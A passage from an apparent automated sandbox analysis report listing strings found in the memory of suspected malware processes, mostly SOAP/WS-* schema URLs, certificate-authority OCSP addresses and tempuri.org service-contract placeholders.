                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE6F000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE6C000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: explorer.exe, 00000007.00000003.2352212980.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3299555771.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2061516657.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: 58B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: 58B.tmp.zx.exe, 00000015.00000002.2281210120.00007FF8A861D000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
                  Source: explorer.exe, 00000007.00000000.2055981067.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3298280027.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2055093245.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16V
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
